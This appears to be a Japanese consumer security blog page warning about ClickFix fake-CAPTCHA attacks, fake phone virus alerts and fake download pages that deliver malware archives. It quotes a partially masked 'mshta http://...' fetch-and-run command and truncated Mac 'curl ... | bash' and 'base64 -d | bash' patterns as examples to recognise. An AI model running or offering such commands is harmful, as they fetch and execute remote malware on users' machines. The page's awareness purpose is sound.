無題なログ

偽警告画面の削除、フィッシング詐欺の迷惑メール、Windows セキュリティの小ネタを書き出す情報ブログです (*^ー^)ノ

【PR】 シャープのノートパソコンノートパソコン dynabook楽天市場Yahoo!ショッピング で販売中。インテルCore、ウェブカメラ内蔵の最新モデルが送料無料で価格価格8万円から♪

| ✏️ Firefly (ファイヤーフライ)

ClickFix攻撃でウイルス感染コマンドがクリップボードに勝手にコピーされた!

偽CAPTCHA確認画面でユーザーをだましClickFixウイルス感染攻撃でマルウェアに感染させる不正なコマンド命令文を解説してもらう。

ClickFix 攻撃で Windows のクリップボード上に勝手にコピーされた ウイルス感染の不正なコマンド (命令文) を Copilot AI に解説してもらいました。 

おほほほほ…… ごきげんよう、庶民の皆さま
 
わたくし、クラリス・フォン・マルウェア、今宵はとっても怪しいコマンドの秘密をお教えいたしますわ
さあ、目をかっぽじってよくご覧なさいませ!
 
🎀 コマンド
>mshta http://193.0xE9.●.●/ksyv.log

💋 クラリスの優雅な解説タイム
mshta
ふふ…… これはまるで忠実な執事
「Microsoft HTML Application」 を起動するための命令ですの
つまり、Windows に備えられたお道具で、HTML 形式のアプリケーションを動かすことができるのですわ
まるで召使いに 「お茶を持ってきなさい」 と命じるようなものですわね

http://193.0xE9.●.●/ksyv.log
まあいやらしい……
この部分はインターネット上の住所 (URL) ですの
ですが、数字が少々おかしいですわね?
例えば 0xE9 は 16 進数で、普通の数字に直すと 233。つまりこのIPアドレスは

> 193.233.●.●

ということになりますの
ふふ、暴いてしまいましたわね
まるで仮面舞踏会の仮面のように、正体を隠しているのですわ

.log ファイル?
ふふ……
一見ただの記録ファイルのように見せかけて、実は中に何か仕込まれている可能性があるのですわ
まるで毒入りの紅茶のように、見た目は普通でも中身は危険ですの

🌹 まとめますと

このコマンドは、Windows の機能を使って、怪しい場所から何かを読み込んで実行しようとしているのですわ
まるで舞踏会に忍び込む泥棒のように、静かに、しかし確実に目的を果たそうとしている……
なんて悪趣味!



  • カテゴリ:
    Windows
  • by
このエントリーをはてなブックマークに追加

| ✏️ Firefly (ファイヤーフライ)

<解決>スマホ液晶が破損、液漏れ?偽故障でウイルス感染警告の詐欺に注意してください

スマホの液晶画面が故障した風のウソ演出でだまし、ウイルス駆除削除を迫る偽警告に注意「A virus has been detected on your phone!」

Andorid & iPhone でネットサーフィン中に唐突に出会う恐れがあります。

スマホの液晶画面が破損!? 正体は偽警告画面

スマホの 液晶パネルが故障・破損 したかのような不適切な画像を背景として使い、嘘のウイルス感染警告 を表示する詐欺に出くわしました。 

FAKE ALERT SCAM virus has been detected on your phone! 偽警告
液晶画面の故障や液漏れ!? 正体は偽警告 Scam Alert

液晶画面に縦線表示の不具合? 画面割れ? 黒い液晶漏れ?

ビックリ仰天しそうだけど、実際は 1 枚の画像ファイルを表示しただけのトリックです。 


液晶漏れの演出に、ウイルス検出も… 全部ウソ

警告メッセージは英語です。

日本語に翻訳すると、「あなたの携帯電話でウイルスが検出された! 携帯電話が故障している。継続して使うには、ウイルスを駆除する必要がある。」 といった意味になります。 

【詐欺! 偽ウイルス警告メッセージの表示例】
A virus has been detected on your phone!
Your phone is faulty. In order for the phone to continue working, you need to remove the virus.
[Remove virus]

ウイルスの感染や検出も嘘デタラメの 偽警告 なので、真に受けないで~! 

  • 液晶画面に縦線や色の乱れ!?
    ウイルス検出や端末の故障を装いながら強烈に不安を煽る

  • 赤い三角のビックリマークで警告ポップアップ
    心理的に焦らせて緊急性を演出する

スマホの液晶画面の故障を装いつつも、警告ポップアップの領域はなぜか綺麗に表示されています。


スマホで偽警告画面! 削除する解決方法

やってはいけないことは ――

  • 偽警告画面に表示されたボタンやリンクをタップしない
    → パニック状態に陥り焦ってタップして誘導されていまうのが現実だけど

  • その先で表示された指示に従って何かアプリをインストールする

  • Eメールアドレス、個人情報、クレジットカード情報を入力する

やるべきこと:は ――

  • ブラウザのタブを閉じてページから離脱する

  • ブラウザのホーム画面に移動する

  • ブラウザアプリ自体を終了させる

駆除・削除は不要で、その場から離れるだけで解決するので、即時行動を迫る卑怯な偽ウイルス感染警告の詐欺に乗せられませぬよーに。 

このエントリーをはてなブックマークに追加

| ✏️ Firefly (ファイヤーフライ)

そこ、ウイルス危険!ダウンロード「your archive file ready」ファイルの正体

コンピュータウイルス危険マルウェア配布に要注意!圧縮ファイルのダウンロード、WindowsやMacで感染被害。your download file archive ready package verified

「Your download is getting ready.」 や 「Your file is ready and verified.」 とは何?

「ファイルをダウンロードする準備ができている」 「あなたのファイルは検証済みです」 という意味だが…。

勝手に誘導される偽ダウンロードページの正体

ネットサーフィン中、リダイレクト型広告の影響で勝手に転送され、こんな英語のメッセージのページに出くわします。 

ファイルのダウンロードを誘うタイトル例:
「Data link generated.」
「Download ready」
「File is ready for download.」
「Package ready」 Firefly
「Ready to download」
「Your archive is ready.」 Firefly
「Your download is ready.」
「Your download link is ready.」
「Your download package ready.」
「Your file download is ready.」
「Your file is getting ready.」
「Your file is ready and verified.」
「Your file is ready to download.」

実物のスクショ画像をいくつか挙げます。

Your file is ready and verified ウイルス不正ファイル配布ダウンロード危険
マルウェア配布中! 危険なダウンロードページ

your file ready download マルウェア配布ダウンロード危険
「ダウンロードの準備ができました」 と称したマルウェア配布

Your Archive Is Ready file
あなたの書庫アーカイブの準備ができた? ダウンロード危険

malware your download link is ready
不正なファイルを配布する危険なダウンロード画面

危険ウイルス配布ダウンロード malware your file is getting archive ready
不正なダウンロードページ! ファイルのダウンロード詐欺

calmfiles download your file ready ウイルス感染危険ダウンロード
リンクをコピーしてダウンロードを開始するよう仕向ける危険な画面

ダウンロード安全ではない ready file download install 危険ファイル
download ready file 安全ではないダウンロード画面

ダウンロード危険YOUR FILE IS READY TO DOWNLOAD安全ウイルス感染
MEGA リンクをコピペするよう案内する危険ダウンロード画面

危険 MEGA Transfer Secure Your File Link Ready
「MEGA Transfer」 を名乗る危険なダウンロード画面

Your file is ready to download
「Google Drive」 を名乗るマルウェア配布ページ

怪しいページに飛ばされて、危険と気づくのは簡単そう?

…と思いきや、これが意外と油断ならないかも。

というのも、見た目は洗練された外観デザインで、危険な雰囲気がなく安全そうに見えるからです。 


■ 偽ダウンロードページでナゾのファイルを配布中

ここは 偽ダウンロードページ です。

英語で次のような手順を示し、ファイルのダウンロードを案内します。

  1. ダウンロードリンクや共有リンクをコピーする

  2. ブラウザのアドレス バーにリンクを貼り付ける

  3. ファイルのダウンロードを開始してネ

verified」 (=検証済み) という言葉を添えて、ファイルは安全なものである感を演出しているけど、マルウェア (コンピュータウイルス) を含むファイルをユーザーにつかませることを目的にしています。 

出会った時の対処方法は ブラウザのタブを閉じて偽ダウンロードページから離脱 しましょう。


■ 圧縮アーカイブ内に危険物

指示通りに進めてダウンロードされるのは書庫ファイルです。

書庫ファイルの拡張子
.zip / .7z / .rar

書庫ファイルを展開 (解凍) すると、出現するのは実行ファイル (拡張子 .exe)、あるいはインストーラーファイル (っ拡張子 .msi) というパターンになります。

  • 勝手に誘導されてしまうリダイレクト型広告
    海外の一般サイトに仕込まれたリダイレクト型広告によって偽ダウンロードページに移動してしまう

  • 正規サービスをマルウェア置き場に悪用
    ダウンロード配布元として MEGA や MediaFire の URL を示す場合あり
    └ MEGA (https //mega.nz/file/###)
    MediaFire (https //www.mediafire.com/file/###)

  • パスワードで保護された脅威
    パスワード付き書庫ファイルは ウイルス対策ソフトのファイルスキャンをスリ抜ける

ユーザーに警告を出すなどして未知のファイルのダウンロードを阻止されてしまわないよう、背後に潜む詐欺師は先手を打っています! 

偽ダウンロードページでウイルス感染に陥る危険パターン

実行ファイル (拡張子 .exe) などをダブルクリックして開いたら感染です。

攻撃ターゲットは、主に Windows 10、Windows 11 ということになります。

 Windows 
× macOS → Mac ユーザー を狙う攻撃も把握したので下記参照
× Android、iPhone

少なくとも、この偽ダウンロードページは スマホを攻撃対象にしていません


誘導されてウイルスを踏み抜くシチュエーション

危険性に気づかず、不正なファイルをうっかり踏み抜くシチュエーションです。

  • 文書、画像、動画、音楽ファイルを別形式に変換してくれる無料ウェブサービス

  • 動画サイトや SNS に投稿された写真や映像を保存できる無料ウェブサービス
    └ YouTube、X (旧 Twitter)、Instagram、TikTok などに対応するサードパーティ製

  • ファイル アップローダー、ファイル共有サイト
    └ 有料製品のクラック、ゲームのチートツール、著作権侵害コンテンツを探索するユーザーを罠にはめる

この手のオンラインサイトを利用している時、偽ダウンロードページに誘導されてしまうと、本来ダウンロードすべきファイルとは違う マルウェア (コンピュータウイルス) の方を手にするリスクが高まります。

Mac ユーザーも! ClickFix 攻撃でウイルス感染被害

Windows ユーザーを罠にはめる攻撃!

そう思っていたら、Mac ユーザーに マルウェア (コンピュータウイルス) をつかませる偽ダウンロードページも別に存在していることに気づきました。 

ClickFix Mac Malware Download Your file is ready!
Mac ターミナルに攻撃処理を貼り付けて実行を促すダウンロード画面

Verifying you are human Fake ClickFix Mac Malware
ターミナルにコピペして実行を指示する Mac 向けの偽ダウンロード画面

Download for macOS Verified Publisher
curl コマンドをターミナルにコピペ実行するよう指示する Mac 向け詐欺画面

Mac ClickFix Terminal Malware Fake reCAPTCHA Verify you are human by completing the action below
Mac ターミナルを開き [⌘command+V] で貼り付けるよう指示する詐欺

ブラウザのユーザーエージェント (UA) を元にユーザーの利用環境を把握して、それぞれの Windows 向けと Mac 向けの偽ダウンロードページに振り分ける仕組みになっていました。


Mac で不正なコマンド実行を促す ClickFix 攻撃

Mac 向け偽ダウンロードページの案内は、次のような流れになっています。

  1. Mac の Terminal (ターミナル) アプリを起動する

  2. コマンドの 「/bin/bash -c "$(curl ~」 や 「echo ~ base64 -d | bash」 をコピペする
    あるいは、ショートカットキー [⌘ command キー+V] を押して貼り付ける

  3. [Enter] キーを押して実行する
    端末のパスワードを入力するよ案内するメッセージが書かれてある場合も

Copilot AI に偽ダウンロードページの中身を尋ねると、「リモートから不明なスクリプトをダウンロードして実行する危険な内容になっていて実行したらダメ!」 という解説をくれました。

  • 攻撃処理で curl、bash の組み合わせ
    curl で取得したスクリプトをそのまま bash に渡すので攻撃者に Mac の完全な制御を許す

  • アプリをインストールする正規の手順と異なる
    Apple やソフトウェアメーカーは通常 .dmg ファイルや公式の App Store 経由で配布する

クリップボードにコピーした攻撃処理を Mac の Terminal (ターミナル) に貼り付けて実行させる手口というこで、これは ClickFix (クリックフィックス) と名付けられています。 

Mac ユーザーを狙う マルウェア (コンピュータウイルス) の感染トラップです。

Apple 2025 MacBook Air M4 チップ搭載 13 インチノートブック: Apple Intelligence のために設計、13.6 インチ Liquid Retina ディスプレイ、16GBユニファイドメモリ、 256GB SSD ストレージ、12MP センターフレームカメラ、Touch ID - シルバー
Apple 2025 MacBook Air M4 チップ搭載 13 インチノートブック 〔PR〕


関連するブログ記事







このエントリーをはてなブックマークに追加

↑このページのトップヘ